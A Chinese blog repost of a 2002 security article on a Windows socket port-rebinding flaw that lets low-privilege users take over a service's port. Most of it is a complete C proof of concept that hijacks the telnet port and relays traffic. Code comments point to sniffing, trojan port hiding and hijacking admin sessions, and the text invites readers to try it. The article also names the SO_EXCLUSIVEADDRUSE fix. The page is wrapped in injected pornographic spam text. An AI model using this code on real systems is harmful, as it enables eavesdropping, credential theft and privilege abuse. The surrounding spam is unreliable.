青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

公告

<2025年11月>
2627282930311
2345678
9101112131415
16171819202122
23242526272829
30123456

統計

  • 隨筆 - 9
  • 文章 - 13
  • 評論 - 3
  • 引用 - 0

常用鏈接

留言簿(1)

隨筆分類

隨筆檔案

文章分類

文章檔案

搜索

  •  

最新評論

閱讀排行榜

評論排行榜

端口截聽
創建時間:2002-11-05
文章屬性:原創
文章提交:flashsky (flashsky1_at_sina.com)

作者:FLASHSKY
EMAIL:flashsky@xfocus.org
站點:www.xfocus.net??www.shopsky.com
轉載請注明原作者安全焦點

在WINDOWS的SOCKET服務器應用的編程中,如下的語句或許比比都是:
?????? s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
?????? saddr.sin_family = AF_INET;
?????? saddr.sin_addr.s_addr = htonl(INADDR_ANY);
?????? bind(s,(SOCKADDR *)&saddr,sizeof(saddr));
????其實這當中存在在非常大的安全隱患,因為在winsock的實現中,對于服務器的綁定是可以多重綁定的,在確定多重綁定使用誰的時候,根據一條原則是誰的指定最明確則將包遞交給誰,而且沒有權限之分,也就是說低級權限的用戶是可以重綁定在高級權限如服務啟動的端口上的,這是非常重大的一個安全隱患。
????這意味著什么?意味著可以進行如下的攻擊:
????1。一個木馬綁定到一個已經合法存在的端口上進行端口的隱藏,他通過自己特定的包格式判斷是不是自己的包,如果是自己處理,如果不是通過127.0.0.1的地址交給真正的服務器應用進行處理。
????2。一個木馬可以在低權限用戶上綁定高權限的服務應用的端口,進行該處理信息的嗅探,本來在一個主機上監聽一個SOCKET的通訊需要具備非常高的權限要求,但其實利用SOCKET重綁定,你可以輕易的監聽具備這種SOCKET編程漏洞的通訊,而無須采用什么掛接,鉤子或低層的驅動技術(這些都需要具備管理員權限才能達到)
????3。針對一些的特殊應用,可以發起中間人攻擊,從低權限用戶上獲得信息或事實欺騙,如在guest權限下攔截telnet服務器的23端口,如果是采用NTLM加密認證,雖然你無法通過嗅探直接獲取密碼,但一旦有admin用戶通過你登陸以后,你的應用就完全可以發起中間人攻擊,扮演這個登陸的用戶通過SOCKET發送高權限的命令,到達入侵的目的。
????4.對于構建的WEB服務器,入侵者只需要獲得低級的權限,就可以完全達到更改網頁目的,很簡單,扮演你的服務器給予連接請求以其他信息的應答,甚至是基于電子商務上的欺騙,獲取非法的數據。

????其實,MS自己的很多服務的SOCKET編程都存在這樣的問題,telnet,ftp,http的服務實現全部都可以利用這種方法進行攻擊,在低權限用戶上實現對SYSTEM應用的截聽。包括W2K+SP3的IIS也都一樣,那么如果你已經可以以低權限用戶入侵或木馬植入的話,而且對方又開啟了這些服務的話,那就不妨一試。并且我估計還有很多第三方的服務也大多存在這個漏洞。
????解決的方法很簡單,在編寫如上應用的時候,綁定前需要使用setsockopt指定SO_EXCLUSIVEADDRUSE要求獨占所有的端口地址,而不允許復用。這樣其他人就無法復用這個端口了。
????下面就是一個簡單的截聽ms telnet服務器的例子,在GUEST用戶下都能成功進行截聽,剩余的就是大家根據自己的需要,進行一些特殊剪裁的問題了:如是隱藏,嗅探數據,高權限用戶欺騙等。

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

DWORD WINAPI ClientThread(LPVOID lpParam);

int main()
{
????WORD wVersionRequested;
????DWORD ret;
????WSADATA wsaData;
????BOOL val;
????SOCKADDR_IN saddr;
????SOCKADDR_IN scaddr;
????int err;
????SOCKET s;
????SOCKET sc;
????int caddsize;
????HANDLE mt;
????DWORD tid;

????wVersionRequested = MAKEWORD( 2, 2 );
????err = WSAStartup( wVersionRequested, &wsaData );
????if ( err != 0 ) {
????????printf("error!WSAStartup failed!\n");
????????return -1;
????}
????saddr.sin_family = AF_INET;

????//截聽雖然也可以將地址指定為INADDR_ANY,但是要不能影響正常應用情況下,應該指定具體的IP,留下127.0.0.1給正常的服務應用,然后利用這個地址進行轉發,就可以不影響對方正常應用了
????saddr.sin_addr.s_addr = inet_addr("192.168.0.60"); ????
????saddr.sin_port = htons(23);
????if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
????{
????????printf("error!socket failed!\n");
????????return -1;
????}
????val = TRUE;
????//SO_REUSEADDR選項就是可以實現端口重綁定的
????if(setsockopt(s,SOL_SOCKET,SO_REUSEADDR,(char *)&val,sizeof(val))!=0)
????{
????????printf("error!setsockopt failed!\n");
????????return -1;
????}
????//如果指定了SO_EXCLUSIVEADDRUSE,就不會綁定成功,返回無權限的錯誤代碼;
????//如果是想通過重利用端口達到隱藏的目的,就可以動態的測試當前已綁定的端口哪個可以成功,就說明具備這個漏洞,然后動態利用端口使得更隱蔽
????//其實UDP端口一樣可以這樣重綁定利用,這兒主要是以TELNET服務為例子進行攻擊
????if(bind(s,(SOCKADDR *)&saddr,sizeof(saddr))==SOCKET_ERROR)
????{
????????ret=GetLastError();
????????printf("error!bind failed!\n");
????????return -1;
????}
????listen(s,2);????
????while(1)
????{
????????caddsize = sizeof(scaddr);
????????//接受連接請求
????????sc = accept(s,(struct sockaddr *)&scaddr,&caddsize);
????????if(sc!=INVALID_SOCKET)
????????{
????????????mt = CreateThread(NULL,0,ClientThread,(LPVOID)sc,0,&tid);
????????????if(mt==NULL)
????????????{
????????????????printf("Thread Creat Failed!\n");
????????????????break;
????????????}
????????}
????????CloseHandle(mt);
????}
????closesocket(s);
????WSACleanup();
????return 0;
}

DWORD WINAPI ClientThread(LPVOID lpParam)
{
????SOCKET ss = (SOCKET)lpParam;
????SOCKET sc;
????unsigned char buf[4096];
????SOCKADDR_IN saddr;
????long num;
????DWORD val;
????DWORD ret;
????//如果是隱藏端口應用的話,可以在此處加一些判斷
????//如果是自己的包,就可以進行一些特殊處理,不是的話通過127.0.0.1進行轉發

????saddr.sin_family = AF_INET;
????saddr.sin_addr.s_addr = inet_addr("127.0.0.1");
????saddr.sin_port = htons(23);
????if((sc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
????{
????????printf("error!socket failed!\n");
????????return -1;
????}
????val = 100;
????if(setsockopt(sc,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
????{
????????ret = GetLastError();
????????return -1;
????}
????if(setsockopt(ss,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
????{
????????ret = GetLastError();
????????return -1;
????}
????if(connect(sc,(SOCKADDR *)&saddr,sizeof(saddr))!=0)
????{
????????printf("error!socket connect failed!\n");
????????closesocket(sc);
????????closesocket(ss);
????????return -1;
????}
????while(1)
????{
????????//下面的代碼主要是實現通過127。0。0。1這個地址把包轉發到真正的應用上,并把應答的包再轉發回去。
????????//如果是嗅探內容的話,可以再此處進行內容分析和記錄
????????????????//如果是攻擊如TELNET服務器,利用其高權限登陸用戶的話,可以分析其登陸用戶,然后利用發送特定的包以劫持的用戶身份執行。
????????num = recv(ss,buf,4096,0);
????????if(num>0)
????????????send(sc,buf,num,0);
????????else if(num==0)
????????????break;
????????num = recv(sc,buf,4096,0);
????????if(num>0)
????????????send(ss,buf,num,0);
????????else if(num==0)
????????????break;
????}
????closesocket(ss);
????closesocket(sc);
????return 0 ;
}

posted on 2006-09-22 15:48 blues 閱讀(169) 評論(0)  編輯 收藏 引用


只有注冊用戶登錄后才能發表評論。
網站導航: 博客園   IT新聞   BlogJava   博問   Chat2DB   管理


青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            亚洲男女自偷自拍| 亚洲视频中文| 亚洲一区二区三区免费视频| 亚洲电影免费观看高清| 久久嫩草精品久久久久| 欧美日韩在线精品| 亚洲福利一区| 欧美日韩成人在线观看| 欧美11—12娇小xxxx| 国产日韩亚洲欧美综合| 麻豆精品视频在线| 国产婷婷色综合av蜜臀av| 日韩午夜三级在线| 99国产精品国产精品久久| 另类国产ts人妖高潮视频| 久久一区中文字幕| 激情婷婷久久| 久久成人人人人精品欧| 午夜精品在线观看| 国产精品日韩精品| 亚洲免费一在线| 亚洲国产成人av| 久久久精品久久久久| 久久久91精品国产一区二区精品| 久久se精品一区二区| 久久爱www久久做| 国产色综合久久| 亚洲国产美国国产综合一区二区| 欧美日韩在线第一页| 日韩视频―中文字幕| 一本色道久久综合亚洲91| 欧美日韩成人在线播放| 日韩一区二区电影网| 亚洲一区视频在线| 国产欧美日本一区视频| 久久国产手机看片| 免费欧美在线| 国产欧美日韩综合一区在线观看 | 性久久久久久久久久久久| 欧美亚一区二区| 亚洲一区在线观看视频 | 久久亚洲精品视频| 黄色一区二区三区| 老巨人导航500精品| 亚洲激情在线观看| 亚洲一区二区三区在线观看视频| 噜噜噜在线观看免费视频日韩| 亚洲欧美激情一区| 国产一区二区三区在线观看视频| 99国产精品视频免费观看一公开 | 国产欧美日韩三级| 久久久视频精品| 亚洲国产欧洲综合997久久| 亚洲视频观看| 韩国成人精品a∨在线观看| 噜噜爱69成人精品| 这里只有精品视频| 美女主播视频一区| 亚洲视频电影图片偷拍一区| 国产欧美精品一区二区三区介绍 | 亚洲国产第一| 欧美日韩视频一区二区| 午夜精品视频在线| 最新高清无码专区| 亚洲激情欧美| 国产精品久线观看视频| 老司机免费视频一区二区三区| 久久久久九九九九| 中文在线一区| 亚洲国产高清自拍| 国产精品一区二区久久久久| 亚洲视频一区二区| 欧美国产三级| 久久精品国产欧美亚洲人人爽| 国产伦精品一区二区三区免费| 亚洲午夜国产一区99re久久| 久久天天躁狠狠躁夜夜av| 一级日韩一区在线观看| 国产精品一区二区久久| 欧美精品在线免费播放| 看片网站欧美日韩| 香蕉国产精品偷在线观看不卡| 国产精品久久久久久妇女6080| 亚洲一级片在线观看| 亚洲国产成人精品女人久久久| 亚洲精品一区二区三区蜜桃久| 欧美精品v日韩精品v韩国精品v | 国产一区二区你懂的| 亚洲一区二区三| 欧美视频二区| 一本在线高清不卡dvd| 亚洲激情自拍| 欧美激情视频给我| 午夜精品久久一牛影视| 亚洲精品在线观看免费| 国产欧美一区二区三区久久人妖| 亚洲免费不卡| 亚洲黄一区二区| 欧美成人免费网站| 你懂的视频一区二区| 久久久久一区二区三区| 黄色另类av| 激情偷拍久久| 伊人久久亚洲热| 亚洲成人在线视频网站| 亚洲电影欧美电影有声小说| 在线国产精品播放| 欧美日韩一区二区三区视频| 久久成人精品一区二区三区| 亚洲欧美日韩另类| 海角社区69精品视频| 亚洲国产精品国自产拍av秋霞| 亚洲视频在线观看网站| 伊人伊人伊人久久| 一区二区三区黄色| 国产精品s色| 欧美一级欧美一级在线播放| 欧美在线啊v一区| 亚洲小视频在线| 欧美成人有码| 欧美福利一区二区| 一区二区三欧美| 久久综合久久综合久久综合| 亚洲一区二区久久| 亚洲性视频网址| 亚洲欧美在线高清| 欧美一区二区三区电影在线观看| 农村妇女精品| 亚洲精品国产精品国自产在线| 久久精品国产一区二区三区| 久久九九国产精品| 亚洲成在线观看| 夜夜嗨网站十八久久| 亚洲欧美一区二区激情| 久久久久国产精品一区三寸| 欧美.www| 麻豆91精品91久久久的内涵| 欧美韩日一区二区| 国产精品免费观看视频| 伊人久久av导航| 一区二区三区不卡视频在线观看 | 欧美日韩成人一区二区| 久久精品国产一区二区三| 亚洲午夜久久久| 久久精品亚洲精品| 欧美日韩精品免费观看视频| 国产精品综合av一区二区国产馆| 欧美性猛交一区二区三区精品| 欧美精品一区二区三区很污很色的 | 国产伦精品一区二区三区视频黑人| 欧美激情综合色| 欧美成人精品福利| 国产欧美韩国高清| 99视频精品| 裸体一区二区| 亚洲一区国产精品| 欧美精品午夜视频| 伊人成人网在线看| 香蕉成人久久| 久久久久久久久久久久久久一区| 欧美一级欧美一级在线播放| 亚洲高清免费| 久久精品一本| 国产精品一区二区久久久久| 日韩午夜视频在线观看| 久久野战av| 亚洲免费在线电影| 欧美视频在线一区| 国产精品日韩久久久久| 99re6热只有精品免费观看| 亚洲精品乱码久久久久久日本蜜臀| 日韩午夜三级在线| 亚洲午夜精品福利| 亚洲国产精品第一区二区三区| 亚洲日本中文字幕区| 久色成人在线| 悠悠资源网亚洲青| 久久久久久久综合| 欧美激情视频在线免费观看 欧美视频免费一| 免费在线观看精品| 亚洲久久成人| 欧美激情视频在线播放| 国产精品久久久久91| 一个人看的www久久| 91久久中文| 欧美国产日韩a欧美在线观看| 国产精品video| 亚洲午夜在线| 一区二区三区高清视频在线观看 | 欧美日韩精品二区| 亚洲精品永久免费精品| 亚洲成人直播| 欧美大香线蕉线伊人久久国产精品| 欧美涩涩视频| 亚洲午夜伦理| 亚洲欧美电影在线观看| 欧美fxxxxxx另类| 99re6这里只有精品视频在线观看| 久久成人18免费观看| 欧美一区激情|